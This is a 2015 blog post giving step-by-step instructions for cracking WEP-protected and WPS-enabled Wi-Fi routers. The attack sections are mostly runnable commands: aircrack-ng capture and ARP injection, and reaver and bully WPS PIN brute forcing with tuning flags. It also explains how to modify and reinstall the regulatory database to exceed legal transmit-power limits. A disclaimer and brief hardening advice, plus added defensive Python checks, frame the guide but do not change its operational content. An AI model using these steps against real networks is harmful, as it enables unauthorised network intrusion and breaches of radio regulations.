How to hack WEP-protected or WPS-enabled Wi-Fi routers with an Alfa AWUS036NH, or: how to protect your Wi-Fi

  • Posted on: 22 May 2015
  • By: Don

A hacker can sit three miles from a house and still be able to break into the router and use the Wi-Fi. But how?

Legal

1. It is illegal to hack other people's Wi-Fi routers. Use this guide for educational purposes only and test it only against your own access points (APs).
2. It is forbidden to remove all transmit power restrictions. Every country has its own transmit power limits.

Tools

- The software: Linux (Kali has everything preinstalled and is recommended; for Ubuntu and other distros, you need to install the needed packages).
- The hardware: the wireless adapter Alfa AWUS036NH (which supports monitor mode, packet injection, and 2000 mW transmit power = 33 dBm).
- The knowledge: basic Linux knowledge, basic network security knowledge.

Hack the TX Power, or: Move to Bolivia and change the limits

The Alfa AWUS036NH supports 2000 mW, i.e. a TX power of 33 dBm, but it ships with a default of 20 dBm, and the system's regulatory database allows a maximum of 30 dBm (= 1000 mW) for Bolivia. Set what is possible:

(Open a terminal; the OS used here is Ubuntu 14.04.)

don@HAL:~$ sudo -s
root@HAL:~# iw reg set BO
root@HAL:~# iw reg get
country BO:
(2402 - 2482 @ 40), (N/A, 30)
(5735 - 5835 @ 80), (N/A, 30)
root@HAL:~# iwconfig wlan2 txpower 30

This changed the card's default of 20 dBm to 30 dBm. Check it:

root@HAL:~# iwconfig
wlan2 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
usb0 no wireless extensions.
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Higher txpower values have no effect at this stage. But we want to double the transmit power (from the current 1000 mW to 2000 mW) by adding another 3 dB, i.e. going from 30 dBm to 33 dBm:

1. Install the packages:

root@HAL:~# apt-get install python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev

2. Download the CRDA files and the wireless regulatory database files:

Choose the latest .bz2 versions ...

https://www.kernel.org/pub/software/network/crda/

https://www.kernel.org/pub/software/network/wireless-regdb/

… and extract them:

root@HAL:~# cd /home/don/Downloads
root@HAL:~/Downloads# tar xvjf crda-1.1.3.tar.bz2

and

root@HAL:~/Downloads# tar xvjf wireless-regdb-2013.11.27.tar.bz2

3. Change the highest limits:

Go to

root@HAL:/# cd /home/don/Downloads/wireless-regdb-2013.11.27

open

root@HAL:~/Downloads/wireless-regdb-2013.11.27# nano db.txt

change Bolivia settings from

country BO: DFS-JP
(2402 - 2482 @ 40), (30)
(5735 - 5835 @ 80), (30)

to

country BO: DFS-JP
(2402 - 2482 @ 40), (33)
(5735 - 5835 @ 80), (30)

and save it with Ctrl+X, then Y, and finally Enter.

4. Swap the old regulatory file with the new one:

Enter the make command:

root@HAL:~/Downloads/wireless-regdb-2013.11.27# make

Go to the location of the old regulatory.bin:

root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd /lib/crda

Make a backup of the file first:

root@HAL:/lib/crda# mv regulatory.bin regulatoryOLD.bin

Go back to the directory of the new regulatory.bin and copy it over:

root@HAL:/lib/crda# cd ~/Downloads/wireless-regdb-2013.11.27
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cp regulatory.bin /lib/crda/regulatory.bin
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd /lib/crda
root@HAL:/lib/crda# ls
pubkeys regulatory.bin regulatoryOLD.bin setregdomain

5. Validate the new regulatory.bin:

Copy the public keys ...

root@HAL:/lib/crda# cd ~/Downloads/wireless-regdb-2013.11.27
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cp root.key.pub.pem ~/Downloads/crda-1.1.3/pubkeys/root.key.pub.pem
root@HAL:~/Downloads/wireless-regdb-2013.11.27# cp linville.key.pub.pem ~/Downloads/crda-1.1.3/pubkeys/linville.key.pub.pem

… and verify:

root@HAL:~/Downloads/wireless-regdb-2013.11.27# cd ~/Downloads/crda-1.1.3/pubkeys
root@HAL:~/Downloads/crda-1.1.3/pubkeys# ls
linville.key.pub.pem root.key.pub.pem

6. Make install:

root@HAL:~/Downloads/crda-1.1.3/pubkeys# cd ~/Downloads/crda-1.1.3
root@HAL:~/Downloads/crda-1.1.3# make
root@HAL:~/Downloads/crda-1.1.3# make install

7. Reboot, then set:

don@HAL:~$ sudo -s
root@HAL:~# iw reg set BO
root@HAL:~# iw reg get
country BO:
(2402 - 2482 @ 40), (N/A, 33)
(5735 - 5835 @ 80), (N/A, 30)
root@HAL:~# iwconfig wlan2 txpower 33

The result (33 dBm = 2000mW):

root@HAL:~# iwconfig
wlan2 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=33 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
usb0 no wireless extensions.
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Troubleshooting:

It is also recommended to add the file (as superuser, sudo)

/etc/udev/rules.d/regulatory.rules

with the content

KERNEL=="regulatory*", ACTION=="change", SUBSYSTEM=="platform", RUN+="/sbin/iw reg set BO"

so that these settings persist across reboots.
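Before setting a tx power it is worth checking what the loaded regulatory domain actually permits on the channel you use. The following is an added example, not code from the original post: it parses the `iw reg get` output shown above (the sample text is constructed to match it), converts between dBm and mW, and reports whether a requested tx power stays within the loaded limit.

```python
import math
import re

# Constructed sample: `iw reg get` output after `iw reg set BO`, as in the post.
SAMPLE_REG_GET = """country BO:
\t(2402 - 2482 @ 40), (N/A, 30)
\t(5735 - 5835 @ 80), (N/A, 30)
"""

# One frequency rule: (start - end @ max_bw), (max_antenna_gain, max_eirp)
RULE_RE = re.compile(r"\((\d+)\s*-\s*(\d+)\s*@\s*(\d+)\),\s*\((?:N/A|[\d.]+),\s*([\d.]+)\)")

def parse_reg_get(text):
    """Return (country code, list of (start_mhz, end_mhz, bw_mhz, max_eirp_dbm))."""
    country, rules = None, []
    for line in text.splitlines():
        m = re.match(r"\s*country (\w+):", line)
        if m:
            country = m.group(1)
            continue
        m = RULE_RE.search(line)
        if m:
            rules.append((int(m.group(1)), int(m.group(2)), int(m.group(3)), float(m.group(4))))
    return country, rules

def dbm_to_mw(dbm):
    return 10 ** (dbm / 10)

def mw_to_dbm(mw):
    return 10 * math.log10(mw)

def max_eirp_dbm(rules, center_mhz):
    """Highest EIRP the loaded domain permits on a channel, or None if not covered."""
    for start, end, _bw, eirp in rules:
        if start <= center_mhz <= end:
            return eirp
    return None

def txpower_within_limit(rules, center_mhz, requested_dbm):
    """True only if the requested tx power is allowed on that channel."""
    limit = max_eirp_dbm(rules, center_mhz)
    return limit is not None and requested_dbm <= limit

if __name__ == "__main__":
    country, rules = parse_reg_get(SAMPLE_REG_GET)
    for dbm in (30, 33):  # the two values the post uses; channel 11 is 2462 MHz
        print(f"{country}: {dbm} dBm = {dbm_to_mw(dbm):.0f} mW, "
              f"allowed on channel 11: {txpower_within_limit(rules, 2462, dbm)}")
```

Run it against the real output of `iw reg get` (or the `iwconfig` Tx-Power line) to confirm the card is not configured above what the loaded domain allows.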

Let's hack your own WEP-protected router now

(You need to install the aircrack-ng packages if you are not using Kali.)

The old WEP standard is highly vulnerable. The whole attack takes less than an hour.

1. Root:

sudo -s

2. Check the wireless adapters:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

4. Capture traffic and find your WEP-protected AP:

airodump-ng mon0

5. Capture from the found WEP AP:

airodump-ng --bssid 00:MY:WE:P0:12:34 -c 11 -w WEPoutput mon0

Change the bssid and the channel (-c) numbers. Wait till you capture a MAC address under the section STATION, like MM:AA:CC:5d:5w:r8.

6. Inject ARP traffic to speed up the process:

aireplay-ng -3 -b 00:MY:WE:P0:12:34 -h MM:AA:CC:5d:5w:r8 mon0

7. Crack the password:

aircrack-ng WEPoutput-01.cap

Aircrack Note: “You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.”

Troubleshooting:

- If there is more than one output file: aircrack-ng WEPoutput*.cap
- FMS/KoreK cracking method: aircrack-ng -K WEPoutput-01.cap

Hack your own WPS-enabled router with Reaver

The WPA2 standard is safe, provided you use a complex password and disable WPS. Running candidate passwords from huge wordlists is a gamble, whereas WPS cracking, where WPS is enabled, gives clear results within 5 to 10 hours. New APs no longer have this WPS vulnerability, but those older than 2013 are still vulnerable through WPS.

1. Root:

sudo -s

2. Check the wireless adapter:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

4. Capture Traffic:

airodump-ng mon0

5. Start Reaver:

reaver -i mon0 -b 01:2A:DD:RE:SS:XX -vv

Troubleshooting:

- Specific: reaver -i mon0 -c 6 -b 01:2A:DD:RE:SS:XX -vv -L -N -d 15
- Waiting command: reaver -i mon0 -b 01:2A:DD:RE:SS:XX --fail-wait=360
- Timeout lower than 5 s: reaver -i mon0 -b 01:2A:DD:RE:SS:XX -t 3
- No delay in pin attempts: reaver -i mon0 -b 01:2A:DD:RE:SS:XX -d 0

Hack your own WPS-enabled router with Bully

1. Root:

sudo -s

2. Check the wireless adapter:

iwconfig

3. Put the wireless adapter into Monitor Mode:

airmon-ng start wlan2

4. Capture Traffic:

airodump-ng mon0

5. Start Bully:

bully mon0 -b 01:2A:DD:RE:SS:XX -e MyAP -c 9

Change the parameters for -b (BSSID), -e (SSID), -c (channel).

Bully needs 4–6 hours to crack the WPS password.

So, how can I protect my Wi-Fi router from hackers?

If someone is interested in hacking into your network, he can choose between many ways to do so. As of today, your Wi-Fi is safe if you do the following:

1. Don't use old routers, especially those with the unsafe WEP standard.
2. Turn the WPS off. Even on new routers with WPS vulnerability patches, disabling is the safer bet.
3. Use long, complex, and unnatural passwords: like U.bTj-L&kd+_da8eW$85.
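The three rules above can be checked mechanically on an access point you administer. The following is an added example, not from the original post: it audits a hostapd-style configuration (assumption: a Linux AP running hostapd; the sample configs are constructed, and a consumer router exposes the same WEP/WPS/passphrase settings in its web UI) and reports every rule that is violated.

```python
import re

# Constructed sample configs in hostapd.conf syntax (assumption: a Linux hostapd AP).
WEAK_CONF = """ssid=MyAP
wpa=1
wpa_passphrase=password1
wps_state=2
"""

HARDENED_CONF = """ssid=MyAP
wpa=2
rsn_pairwise=CCMP
wpa_passphrase=U.bTj-L&kd+_da8eW$85
wps_state=0
"""

def parse_conf(text):
    """Turn key=value lines into a dict; blank lines and # comments are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            conf[key.strip()] = value.strip()
    return conf

def password_is_strong(pw, min_len=16):
    """At least min_len characters and three of four character classes."""
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")
    return len(pw) >= min_len and sum(bool(re.search(c, pw)) for c in classes) >= 3

def audit_hostapd_config(text):
    """Return findings as strings; an empty list means all three rules hold."""
    conf = parse_conf(text)
    findings = []
    # Rule 1: no WEP keys, and WPA2 only (wpa=1 is WPA1, wpa=3 allows both).
    if "wep_default_key" in conf or any(k.startswith("wep_key") for k in conf):
        findings.append("WEP key configured: remove all wep_* settings")
    if conf.get("wpa", "0") != "2":
        findings.append("wpa is not 2: enable WPA2 only")
    if "TKIP" in conf.get("rsn_pairwise", ""):
        findings.append("rsn_pairwise allows TKIP: use CCMP only")
    # Rule 2: WPS off (wps_state 0 = disabled, 1 = unconfigured, 2 = configured).
    if conf.get("wps_state", "0") != "0" or "ap_pin" in conf:
        findings.append("WPS enabled: set wps_state=0 and drop ap_pin")
    # Rule 3: a long, mixed passphrase.
    pw = conf.get("wpa_passphrase")
    if pw is not None and not password_is_strong(pw):
        findings.append("wpa_passphrase is short or simple: use 16+ mixed characters")
    return findings
```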
